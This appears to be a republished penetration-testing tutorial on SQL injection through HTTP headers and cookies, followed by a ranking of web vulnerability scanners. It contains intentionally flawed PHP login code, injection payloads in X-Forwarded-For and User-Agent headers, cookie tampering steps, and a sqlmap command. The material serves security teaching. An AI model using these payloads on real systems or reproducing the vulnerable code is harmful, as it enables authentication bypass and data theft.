Beyond GET/POST: Testing HTTP Headers and Cookies for SQL Injection

Why HTTP Headers and Cookies Matter

During vulnerability assessment and penetration testing, identifying all possible input vectors is the first step. While most tools focus on GET and POST parameters, HTTP headers and cookies can also carry user‑controlled data that may be vulnerable to SQL injection.

Scanner Coverage of Input Vectors

A comparison of 60 commercial and open‑source black‑box web scanners (originally published as “Scanning Legion: Accuracy Evaluation & Feature Comparison”) shows that 75% of scanners fail to test HTTP header parameters, and about 70% mishandle cookie parameters. GET and POST support is generally adequate, but many tools produce unsatisfactory results when headers are used as injection vectors.

Potential SQL Injection via HTTP Headers

X‑Forwarded‑For

The X-Forwarded-For header often contains the client IP address. If the application stores this value without proper sanitisation, an attacker can inject arbitrary SQL code.

$req = mysql_query("SELECT user,password FROM admins WHERE user='".sanitize($_POST['user'])."' AND password='".md5($_POST['password'])."' AND ip_adr='".ip_adr()."'");

The helper functions used are:

function sanitize($param){
    if (is_numeric($param)) {
        return $param;
    } else {
        return mysql_real_escape_string($param);
    }
}

function ip_adr() {
    if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $ip_adr = $_SERVER['HTTP_X_FORWARDED_FOR'];
    } else {
        $ip_adr = $_SERVER["REMOTE_ADDR"];
    }
    if (preg_match("#^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#",$ip_adr)) {
        return $ip_adr;
    } else {
        return $_SERVER["REMOTE_ADDR"];
    }
}

By sending a crafted request such as:

GET /index.php HTTP/1.1
Host: victim.com
X-Forwarded-For: 127.0.0.1' or 1=1#

the attacker can bypass authentication.

User‑Agent

The User-Agent header may be stored by some applications (e.g., for shopping‑cart tracking). An injection example:

GET /index.php HTTP/1.1
Host: victim.com
User-Agent: aaa' or 1/*

Referer

If the Referer header is written to a database without filtering, it can also be a source of SQL injection:

GET /index.php HTTP/1.1
Host: victim.com
User-Agent: aaa' or 1/*
Referer: http://malicious.example

Manual Testing of Cookie Vulnerabilities

Browser extensions such as Cookie Manager+ allow inspection, editing, and creation of cookies. By modifying a cookie value (e.g., appending a single quote) and sending the request, a SQL error can be observed, confirming the vulnerability.

Another useful tool is Tamper Data , which intercepts and modifies HTTP requests, including headers and cookies. By adding order by 4 to a cookie and observing the server response, the number of columns in the underlying query can be inferred.

Automated Testing with sqlmap

sqlmap

is a popular open‑source tool that can test and exploit SQL injection flaws, including those in cookies and headers. By default it scans GET and POST parameters; setting --level 2 adds cookie testing, and --level 3 includes User-Agent and Referer. Specific parameters can be forced with the -p option.

./sqlmap.py -u 'http://127.0.0.1/vulnerabilities/sqli/?id=1&Submit=Submit#' \
    --cookie='PHPSESSID=0e4jfbrgd8190ig3uba7rvsip1; security=low' \
    --string='First name' --dbs --level 3 -p PHPSESSID

Scoring Methodology and Scanner Rankings

To balance detection accuracy and input‑vector coverage, each scanner receives a score that is the average of its detection rate and the percentage of supported vectors (GET, POST, Cookie, Headers). The top 14 scanners by this metric are:

Arachni – 100 % detection, 100 % coverage (average 100 %).

sqlmap – 97.06 % detection, 100 % coverage (average 98.53 %).

IBM AppScan – 93.38 % detection, 100 % coverage (average 96.69 %).

Acunetix WVS – 89.71 % detection, 100 % coverage (average 94.85 %).

NTOSpider – 85.29 % detection, 100 % coverage (average 92.64 %).

Nessus – 82.35 % detection, 100 % coverage (average 91.17 %).

WebInspect – 75.74 % detection, 100 % coverage (average 87.87 %).

Burp Suite Pro – 72.06 % detection, 100 % coverage (average 86.03 %).

Cenzic Pro – 63.24 % detection, 100 % coverage (average 81.62 %).

SkipFish – 50.74 % detection, 100 % coverage (average 75.37 %).

Wapiti – 100 % detection, 50 % coverage (average 75 %).

Netsparker – 98 % detection, 50 % coverage (average 74 %).

Paros Pro – 93.38 % detection, 50 % coverage (average 71.69 %).

ZAP – 77.21 % detection, 50 % coverage (average 63.60 %).

Recommendations

For Developers

Treat cookies and any other client‑controlled data (including custom headers) with the same validation and sanitisation rigor applied to standard form inputs.

For Testers

Include HTTP header manipulation—especially Referer and User-Agent —in your testing checklist. Define clear test cases for each vector, as these headers are often stored or reflected by applications and can lead to SQL injection or XSS.

Disclaimer: The content is sourced from publicly available internet material and is provided for reference and discussion only. Copyright belongs to the original authors or institutions.